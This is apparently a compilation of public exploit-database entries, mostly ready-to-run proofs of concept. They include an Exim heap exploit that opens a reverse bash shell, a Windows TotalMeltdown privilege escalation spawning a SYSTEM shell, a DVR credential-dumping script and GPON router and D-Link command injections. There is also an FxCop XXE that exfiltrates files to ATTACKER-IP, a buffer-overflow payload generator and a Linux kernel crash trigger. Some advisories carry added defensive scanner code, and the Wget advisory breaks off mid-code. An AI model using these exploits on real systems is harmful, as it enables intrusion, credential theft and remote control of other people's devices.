
#!/usr/bin/python
import time
import socket
import struct
s = None
f = None
def logo():
   print
   print "        CVE-2018-6789 Poc Exploit"
   print "@straight_blast ; straightblast426@gmail.com"
   print
def connect(host, port):
   global s
   global f
   s = socket.create_connection((host,port))
   f = s.makefile('rw', bufsize=0)
def p(v):
   return struct.pack("<Q", v)
def readuntil(delim='\n'):
   data = ''
   while not data.endswith(delim):
      data += f.read(1)
   return data
def write(data):
   f.write(data + "\n")
def ehlo(v):
   write("EHLO " + v)
   readuntil('HELP')
def unrec(v):
   write(v)
   readuntil('command')
def auth_plain(v):
   encode = v.encode('base64').replace('\n','').replace('=','')
   write("AUTH PLAIN " + encode)
   readuntil('data')
def one_byte_overwrite():
   v = "C" * 8200
   encode = v.encode('base64').replace('\n','').replace('=','')
   encode = encode[:-1] + "PE"
   write("AUTH PLAIN " + encode)
   readuntil('data')
def exploit():
   logo()
   connect('localhost', 25)
   print "[1] connected to target"
   time.sleep(0.5)   
   
   ehlo("A" * 8000)     
   ehlo("B" * 16)
   print "[2] created free chunk size 0x6060 in unsorted bin"
   
   unrec("\xff" * 2000)
   ehlo("D" * 8200)
   one_byte_overwrite()
   print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"
   
   fake_header  = p(0) 
   fake_header += p(0x1f51)
   auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))
   print "[4] patched chunk with fake header so extended chunk can be freed"
   
   ehlo("F" * 16)
   print "[5] freed extended chunk"
   
   unrec("\xff" * 2000)
   unrec("\xff" * 2000)
   print "[6] occupied 1st and 3rd item in unsorted bin with fillers"
   
   fake_header  = p(0x4110)
   fake_header += p(0x1f50)   
   auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))
   print "[7] patched chunk with fake header so extended chunk can be allocated"
   
   address = 0x55d7e5864480
   auth_plain("H" * 8200 + p(0x2021) + p(address)  + p(0x2008) + "H" * 184)
   print "[8] overwrite 'next' pointer with ACL store block address"
   
   ehlo("I" * 16)
   print "[9] freed the ACL store block"
   
   acl_smtp_rcpt_offset = 288
   local_host = '192.168.0.159'
   local_port = 1337
   cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
   cmd_expansion_string = "${run{" + cmd + "}}\0"
   auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) 
   print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"

   write("MAIL FROM:<test@pwned.com>")
   readuntil("OK")
   write("RCPT TO:<shell@pwned.com>")   
   print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
   print
if __name__ == '__main__':
   exploit()
            
# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234)

For more information read
[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).

To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).

Before using the script, install all of its dependencies:

```shell
$ pip install -r ./requirements.txt
```

With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
functions properly.

1. Restart the router to provide access to the engineering page.
2. Start the PoC as the root user (required for operating with Bluetooth),
   passing the command to execute as an argument:

    ```shell
    $ ./ble_norton_core.py "/etc/init.d/dropbear start"
    ```

    After the script has executed successfully, we get access to the device over
    SSH, logging in as `root` with the password `admin`:

    ```shell
    $ ssh root@norton.core
    ```

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44574.zip

            
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by InsertScript 

%PDF-1. % can be truncated to %PDF-\0

1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
    <interactive>1</interactive>
</pdf></present></config>

<template>
    <subform name="_">
        <pageSet/>
        <field id="Hello World!">
            <event activity="docReady" ref="$host" name="event__click">
               <submit 
                     textEncoding="UTF-16&#xD;&#xA;test: test&#xD;&#xA;"
                     xdpContent="pdf datasets xfdf"
                     target="http://example.com/test"/>
            </event>
</field>
    </subform>
</template>
</xdp:xdp>
endstream
endobj

trailer <<
    /Root <<
        /AcroForm <<
            /Fields [<<
                /T (0)
                /Kids [<<
                    /Subtype /Widget
                    /Rect []
                    /T ()
                    /FT /Btn
                >>]
            >>]
            /XFA 1 0 R
        >>
        /Pages <<>>
    >>
>>
            
# -*- coding: utf-8 -*- 
import json
import requests
import argparse
import tableprint as tp

class Colors:
    BLUE        = '\033[94m'
    GREEN       = '\033[32m'
    RED         = '\033[0;31m'
    DEFAULT     = '\033[0m'
    ORANGE      = '\033[33m'
    WHITE       = '\033[97m'
    BOLD        = '\033[1m'
    BR_COLOUR   = '\033[1;37;40m'

banner = '''
                             __..--.._
      .....              .--~  .....  `.
    .":    "`-..  .    .' ..-'"    :". `
    ` `._ ` _.'`"(     `-"'`._ ' _.' '
         ~~~      `.          ~~~
                  .'
                 /
                (
                 ^---'


 [*] @capitan_alfa
'''

details = ''' 
 # Exploit Title:   DVRs; Credentials Exposed
 # Date:            09/04/2018
 # Exploit Author:  Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
                                description=' [+] Obtaining Exposed credentials', 
                                epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
                                version="1.1")

parser.add_argument('--host',   dest="HOST",    help='Host',    required=True)
parser.add_argument('--port',   dest="PORT",    help='Port',    default=80)

args    =   parser.parse_args()

HST     =   args.HOST
port    =   args.PORT

headers = {}

fullHost_1  =   "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host        =   "http://"+HST+":"+str(port)+"/"

print Colors.GREEN+banner+Colors.DEFAULT


def makeReqHeaders(xCookie):
    headers["Host"]             =  host
    headers["User-Agent"]       = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
    headers["Accept"]           = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
    headers["Accept-Languag"]   = "es-AR,en-US;q=0.7,en;q=0.3"
    headers["Connection"]       = "close"
    headers["Content-Type"]     = "text/html"
    headers["Cookie"]           = "uid="+xCookie
    
    return headers

try:
    rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
    print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
    exit()

badJson = rX.text
try:
    dataJson = json.loads(badJson)
    totUsr = len(dataJson["list"])   #--> 10
except Exception, e:
    print " [+] Error: "+str(e)
    print " [>] json: "+str(rX)
#    print " [>] Request: \n"+str(makeReqHeaders(xCookie="admin"))
    exit()


print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT

print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "

final_data = []
try:
    for obj in range(0,totUsr):

        temp = []

        _usuario    = dataJson["list"][obj]["uid"]
        _password   = dataJson["list"][obj]["pwd"]
        _role       = dataJson["list"][obj]["role"]

        temp.append(_usuario) 
        temp.append(_password)
        temp.append(_role)

        final_data.append(temp)

        hdUsr  = Colors.GREEN + "Username" + Colors.DEFAULT
        hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
        hdRole = Colors.GREEN + "Role ID"  + Colors.DEFAULT

        cabeceras = [hdUsr, hdPass, hdRole] 

    tp.table(final_data, cabeceras, width=20)

except Exception, e:
    print "\n [!]: "+str(e)
    print " [+] "+ str(dataJson)

print "\n"
            
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
 
struct sockaddr_llc {
 short  sllc_family;
 short  sllc_arphrd;
 unsigned char   sllc_test;
 unsigned char   sllc_xid;
 unsigned char sllc_ua;
 unsigned char   sllc_sap;
 unsigned char   sllc_mac[6];
 unsigned char   __pad[2];
};
 
void test()
{
 int fd = socket(AF_LLC, SOCK_STREAM, 0);
 char output[32] = "lo";
 socklen_t len;
 setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
 struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
 struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));
 
 char msg[0x10] = "aaaa";
 send(fd, msg, 0x10, 0);
}
 
int main()
{
 test();
 return 0;
}
            
#!/bin/bash

echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the output…."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
            
"The DCS-5020L Wireless N Day & Night Pan/Tilt Cloud Camera is a day/night network camera that easily connects to your existing home network for remote viewing on a range of mobile devices. It features pan, tilt and digital zoom function to allow you to see a wider area with a single camera, built-in Wi-Fi extender to effortlessly expand your wireless coverage, night vision up to 5 metres, sound and motion detection for the ultimate in peace of mind, and H.264 video compression for a high-quality image."

This walkthrough demonstrates just how easy it can be to find vulnerabilities in Internet of Things (IoT) devices. The process of finding the following command injection can be broken down into 3 steps that are more akin to a 100-point CTF challenge: download the binary, run strings, and trace the input from the system call back to its origin.

An attacker can escape the 'sed' command with a simple payload, such as '`touch a`'. Another example that fits is AdminID=a'`telnetd`', which allows a user to log in as "a", which becomes the new root account:

Source: https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/
            
#include "stdafx.h"

#define	PML4_BASE	0xFFFFF6FB7DBED000
#define	PDP_BASE	0xFFFFF6FB7DA00000
#define	PD_BASE		0xFFFFF6FB40000000
#define	PT_BASE	0xFFFFF68000000000

typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;

#pragma pack(push,4)
typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {
	UCHAR Type;
	UCHAR ShareDisposition;
	USHORT Flags;
	union {
		struct {
			PHYSICAL_ADDRESS Start;
			ULONG Length;
		} Generic;

		struct {
			PHYSICAL_ADDRESS Start;
			ULONG Length;
		} Port;

		struct {
#if defined(NT_PROCESSOR_GROUPS)
			USHORT Level;
			USHORT Group;
#else
			ULONG Level;
#endif
			ULONG Vector;
			KAFFINITY Affinity;
		} Interrupt;

		struct {
			union {
				struct {
#if defined(NT_PROCESSOR_GROUPS)
					USHORT Group;
#else
					USHORT Reserved;
#endif
					USHORT MessageCount;
					ULONG Vector;
					KAFFINITY Affinity;
				} Raw;

				struct {
#if defined(NT_PROCESSOR_GROUPS)
					USHORT Level;
					USHORT Group;
#else
					ULONG Level;
#endif
					ULONG Vector;
					KAFFINITY Affinity;
				} Translated;
			} DUMMYUNIONNAME;
		} MessageInterrupt;

		struct {
			PHYSICAL_ADDRESS Start; 
			ULONG Length;
		} Memory;

		struct {
			ULONG Channel;
			ULONG Port;
			ULONG Reserved1;
		} Dma;

		struct {
			ULONG Channel;
			ULONG RequestLine;
			UCHAR TransferWidth;
			UCHAR Reserved1;
			UCHAR Reserved2;
			UCHAR Reserved3;
		} DmaV3;

		struct {
			ULONG Data[3];
		} DevicePrivate;

		struct {
			ULONG Start;
			ULONG Length;
			ULONG Reserved;
		} BusNumber;

		struct {
			ULONG DataSize;
			ULONG Reserved1;
			ULONG Reserved2;
		} DeviceSpecificData;

		struct {
			PHYSICAL_ADDRESS Start;
			ULONG Length40;
		} Memory40;

		struct {
			PHYSICAL_ADDRESS Start;
			ULONG Length48;
		} Memory48;

		struct {
			PHYSICAL_ADDRESS Start;
			ULONG Length64;
		} Memory64;

		struct {
			UCHAR Class;
			UCHAR Type;
			UCHAR Reserved1;
			UCHAR Reserved2;
			ULONG IdLowPart;
			ULONG IdHighPart;
		} Connection;

	} u;
} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;
#pragma pack(pop,4)

typedef enum _INTERFACE_TYPE {
	InterfaceTypeUndefined,
	Internal,
	Isa,
	Eisa,
	MicroChannel,
	TurboChannel,
	PCIBus,
	VMEBus,
	NuBus,
	PCMCIABus,
	CBus,
	MPIBus,
	MPSABus,
	ProcessorInternal,
	InternalPowerBus,
	PNPISABus,
	PNPBus,
	Vmcs,
	ACPIBus,
	MaximumInterfaceType
} INTERFACE_TYPE, *PINTERFACE_TYPE;

typedef struct _CM_PARTIAL_RESOURCE_LIST {
	USHORT                         Version;
	USHORT                         Revision;
	ULONG                          Count;
	CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];
} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;

typedef struct _CM_FULL_RESOURCE_DESCRIPTOR {
	INTERFACE_TYPE           InterfaceType;
	ULONG                    BusNumber;
	CM_PARTIAL_RESOURCE_LIST PartialResourceList;
} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;

typedef struct _CM_RESOURCE_LIST {
	ULONG                       Count;
	CM_FULL_RESOURCE_DESCRIPTOR List[1];
} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;

struct memory_region {
	ULONG64 size;
	ULONG64 address;
};

// Very hack'y way of trying to map out physical memory regions to try and reduce
// risk of BSOD
DWORD parse_memory_map(struct memory_region *regions) {
	HKEY hKey = NULL;
	LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory";
	LPTSTR pszValueName = L".Translated";
	LPBYTE lpData = NULL;
	DWORD dwLength = 0, count = 0, type = 0;

	if (RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) != ERROR_SUCCESS)
	{
		printf("[*] Could not get reg key\n");
		return 0;
	}

	if (RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) != ERROR_SUCCESS)
	{
		printf("[*] Could not query hardware key\n");
		return 0;
	}

	lpData = (LPBYTE)malloc(dwLength);
	RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);

	CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;

	for (int i = 0; i < resource_list->Count; i++) {
		for (int j = 0; j < resource_list->List[i].PartialResourceList.Count; j++) {
			if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {
				regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;
				regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;
				regions++;
				count++;
			}
		}
	}

	return count;
}

int main()
{
	printf("TotalMeltdown PrivEsc exploit by @_xpn_\n");
	printf("  paging code by @UlfFrisk\n\n");

	unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;
	DWORD done;
	DWORD count;

	// Parse registry for physical memory regions
	printf("[*] Getting physical memory regions from registry\n");
	struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);

	count = parse_memory_map(regions);
	if (count == 0) {
		printf("[X] Could not find physical memory region, quitting\n");
		return 2;
	}

	for (int i = 0; i < count; i++) {
		printf("[*] Physical memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size);
	}

	// Check for vulnerability
	__try {
		int test = *(unsigned long long *)PML4_BASE;
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[X] Could not access PML4 address, system likely not vulnerable\n");
		return 2;
	}

	// setup: PDPT @ fixed hi-jacked physical address: 0x10000
	// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry
	// we can hijack.
	for (iPML4 = 256; iPML4 < 512; iPML4++) {
		vaPML4e = PML4_BASE + (iPML4 << 3);
		if (*(unsigned long long *)vaPML4e) { continue; }

		// When we find an entry, we add a pointer to the next table (PDPT), which will be
		// stored at the physical address 0x10000
		*(unsigned long long *)vaPML4e = 0x10067;
		break;
	}
	printf("[*] PML4 Entry Added At Index: %d\n", iPML4);

	// Here, the PDPT table is referenced via a virtual address.
	// For example, if we added our hijacked PML4 entry at index 256, this virtual address
	// would be 0xFFFFF6FB7DA00000 + 0x100000
	// This allows us to reference the physical address 0x10000 as:
	// PML4 Index: 1ed | PDPT Index : 1ed |	PDE Index : 1ed | PT Index : 100
	vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));
	printf("[*] PDPT Virtual Address: %p", vaPDPT);

	// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages
	// Below is responsible for adding 31 entries to the PDPT
	for (iPDPT = 0; iPDPT < 31; iPDPT++) {
		*(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);
	}

	// For each of the PDs, a further 512 PT's are created. This gives access to
	// 512 * 32 * 2mb = 33gb physical memory space
	for (iPDPT = 0; iPDPT < 31; iPDPT++) {
		if ((iPDPT % 3) == 0)
			printf("\n[*] PD Virtual Addresses: ");

		vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));
		printf("%p ", vaPD);

		for (iPD = 0; iPD < 512; iPD++) {
			// Below, notice the 0xe7 flags added to each entry.
			// This is used to create a 2mb page rather than the standard 4096 byte page.
			*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;
		}
	}

	printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n");

	#define EPROCESS_IMAGENAME_OFFSET 0x2e0
	#define EPROCESS_TOKEN_OFFSET 0x208
	#define EPROCESS_PRIORITY_OFFSET 0xF  // This is the offset from IMAGENAME, not from base

	unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;
	unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	printf("[*] Hunting for _EPROCESS structures in memory\n");

	for (int j = 0; j < count; j++) {
		printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size);

		for (unsigned long long i = regions[j].address; i < regions[j].address + regions[j].size; i++) {
			
			__try {
				// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
				if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) {
					if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
						ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
						printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS);
					}
				}
				// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
				else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) {
					if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
						systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
						printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS);
					}
				}

				if (systemEPROCESS != 0 && ourEPROCESS != 0) {
					// Swap the tokens by copying the pointer to System Token field over our process token
					printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);
					*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);
					printf("[*] Done, spawning SYSTEM shell...\n\n");

					CreateProcessA(0,
						"cmd.exe",
						NULL,
						NULL,
						TRUE,
						0,
						NULL,
						"C:\\windows\\system32",
						&si,
						&pi);
					break;
				}
			}
			__except (EXCEPTION_EXECUTE_HANDLER) {
				printf("[X] Exception occurred, stopping to avoid BSOD\n");
				return 2;
			}
		}
	}
    return 0;
}
            
# Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection
# Date: 2018-03-15
# Exploit Author: Debashis Pal 
# Vendor Homepage: www.microsoft.com
# Version: Microsoft Windows "FxCop" v10-12 
# CVE :  N/A 
 
***Greetz: indoushka|Eduardo|Dirty0tis***

Security Issue:
================
FxCop is vulnerable to XML external entity injection attacks, allowing local file exfiltration and/or NTLM hash theft. Tested on Windows 7 and Windows 10 with the downloaded SDK; it works on both.
If you have the particular SDK in question, it is probably there but needs to be installed, as it was for me.


MSRC Response:
=============
"We've determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0  as far as SDKs are concerned, with version 13.0 skipped).
We have confirmation that the SDKs for Win8+ don't ship FxCop
We are going to pull Win7 SDKs containing v10-v12 of FxCop.  Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run
after an SDK's install (if even feasible) would just draw attention to the problem.
Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected.

In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability."


Exploit/POC:
=============
1) python -m SimpleHTTPServer

2) "POC.FxCop" 

<?xml version="1.0"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "c:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8000/payload.dtd">
%dtd;]>
<FxCopProject Version="1.36" Name="My FxCop Project">&send;</FxCopProject>


3) "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8000?%file;'>">
%all;

4) Import or Open "POC.FxCop" file in FxCop


Files get exfiltrated to attacker server.
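A pre-screening check a defender can run over untrusted .FxCop project files before they are opened in a DTD-honouring tool. This is an added example, not Microsoft's or the advisory author's code; it uses the POC.FxCop document above (with the advisory's own ATTACKER-IP placeholder) as constructed input and flags exactly the constructs the out-of-band XXE relies on.

```python
"""Flag the DTD constructs an out-of-band XXE such as POC.FxCop relies on:
a DOCTYPE, external (SYSTEM/PUBLIC) entities, parameter-entity references,
a remote URL used as an entity source, and custom general-entity references."""
import re

# Constructed sample: the POC.FxCop document from the advisory above.
POC_FXCOP = r'''<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8000/payload.dtd">
%dtd;]>
<FxCopProject Version="1.36" Name="My FxCop Project">&send;</FxCopProject>
'''

# Constructed sample: a project file carrying no DTD at all.
BENIGN_FXCOP = '''<?xml version="1.0"?>
<FxCopProject Version="1.36" Name="My FxCop Project"></FxCopProject>
'''

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM|PUBLIC ... >  (the rest holds the quoted literals)
_EXT_ENTITY = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)\b([^>]*)>', re.I)
_PE_REF = re.compile(r"%([\w.-]+);")      # %name;
_GE_REF = re.compile(r"&([\w.-]+);")      # &name; (numeric refs use '#', not \w)
_PREDEFINED = {"amp", "lt", "gt", "quot", "apos"}
_REMOTE = ("http:", "https:", "ftp:")


def scan_xml_for_xxe(text):
    """Return a list of human-readable findings; empty when the file has no
    DTD-related content at all."""
    findings = []
    if _DOCTYPE.search(text):
        findings.append("DOCTYPE declaration present")
    for pe, name, kind, rest in _EXT_ENTITY.findall(text):
        scope = "parameter" if pe else "general"
        # For PUBLIC entities the system literal is the last quoted string.
        literals = re.findall(r'"([^"]*)"', rest)
        uri = literals[-1] if literals else "?"
        findings.append(f"external {scope} entity '{name}' ({kind.upper()}) -> {uri}")
        if uri.lower().startswith(_REMOTE):
            findings.append(f"entity '{name}' loads a remote resource")
    for name in _PE_REF.findall(text):
        findings.append(f"parameter entity reference %{name};")
    for name in _GE_REF.findall(text):
        if name not in _PREDEFINED:
            findings.append(f"custom entity reference &{name};")
    return findings


def is_safe_to_open(text):
    """Policy: a project file is opened only if it carries no DTD constructs."""
    return not scan_xml_for_xxe(text)


if __name__ == "__main__":
    for label, doc in (("POC.FxCop", POC_FXCOP), ("benign", BENIGN_FXCOP)):
        print(f"{label}: safe={is_safe_to_open(doc)}")
        for f in scan_xml_for_xxe(doc):
            print("  -", f)
```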


Disclosure Timeline:
=============================
Vendor Notification: March 15, 2018
Vendor opens MSRC Case 44322?: March 16, 2018
Vendor reproduces issue : April 6, 2018
Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
May 9, 2018 : Public Disclosure
            
###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################

#!/usr/bin/python
  
buffer = "A" * 780
  
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
GNU Wget Cookie Injection [CVE-2018-0494]
=========================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt


Overview
--------

GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
the cookie jar file.


Description
-----------

Normally a website should not be able to set cookies for other domains. Due to
insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
values to the cookie jar file, bypassing this security restriction.


Impact
------

An external attacker is able to inject arbitrary cookie values into the cookie jar
file, adding new cookies or replacing existing ones.


Details
-------

The discovered vulnerability, described in more detail below, enables the attack
described here in brief.

1. The attacker-controlled web site sends a specially crafted Set-Cookie header
   to inject a new authentication cookie for example.com, replacing the existing
   one. To succeed, the victim must perform a wget operation against the
   attacker-controlled site, for example:
   wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
2. The victim uses wget to post some secret to api.example.com:
   wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload

Since the attacker was able to replace the authentication cookie for example.com,
the secret.txt data will be posted to the attacker's account instead of the
victim's.


Vulnerabilities
---------------

1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]

The cookie parsing implementation performs too lax input validation when parsing
the Set-Cookie response from the server. Consider the following malicious response:

HTTP/1.1 200 OK
Content-Length: 0
Set-Cookie: foo="bar
 .google.com    TRUE    /       FALSE   1900000000      injected        cookie
        ";expires=Thursday, 01-Jan-2032 08:00:00 GMT


When parsed by Wget and stored to a cookie jar file it will appear as:

# HTTP cookie file.
# Generated by Wget on 2018-04-27 23:28:21.
# Edit at your own risk.

127.0.0.1:7777  FALSE   /       FALSE   1956556800      foo     "bar
 .google.com    TRUE    /       FALSE   1900000000      injected        cookie
        "

Since the Wget cookie jar parser skips any leading spaces, the .google.com line
will be picked up.

Note: The order in which the hosts/domains are stored in the cookie jar is derived
from the hashing function used to speed up the lookups. If an existing cookie is
to be replaced, the server hostname used to serve the Set-Cookie will need to be
carefully chosen so that its hash entry lands below the targeted domain. If not,
the original cookie will be used instead of the injected one.
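The lax-versus-strict parsing at the heart of this bug, as an added example (not Wget's code): a reader that models the vulnerable leading-whitespace skip, a hardened jar reader, the write-time Set-Cookie check where the fix belongs, and an audit of an existing jar file. The jar text and header value are the advisory's samples, embedded here as constructed strings.

```python
"""Offline model of the Set-Cookie / cookie-jar injection and of the
validation a hardened parser applies at read and at write time."""
import re

# Constructed sample: the jar the advisory shows Wget writing after the
# malicious response (tabs written as \t).
POISONED_JAR = """# HTTP cookie file.
# Generated by Wget on 2018-04-27 23:28:21.
# Edit at your own risk.

127.0.0.1:7777\tFALSE\t/\tFALSE\t1956556800\tfoo\t"bar
 .google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie
\t"
"""

# Constructed sample: the Set-Cookie header value from the malicious response.
MALICIOUS_SET_COOKIE = (
    'foo="bar\r\n .google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie'
    '\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00 GMT'
)

FIELDS = ("domain", "flag", "path", "secure", "expires", "name", "value")
_CTL = re.compile(r"[\x00-\x1f\x7f]")   # CR, LF, TAB and other control octets


def parse_jar_lax(text):
    """Model of the vulnerable reader: leading whitespace is stripped before the
    line is split, so the attacker's indented '.google.com' line is accepted."""
    cookies = []
    for raw in text.splitlines():
        line = raw.lstrip()  # the lax step
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) == len(FIELDS):
            cookies.append(dict(zip(FIELDS, fields)))
    return cookies


def parse_jar_strict(text):
    """Hardened reader: a record must start in column 0, have exactly seven
    tab-separated fields, and every field must be well-formed."""
    cookies = []
    for raw in text.splitlines():
        if not raw or raw.startswith("#") or raw[0].isspace():
            continue
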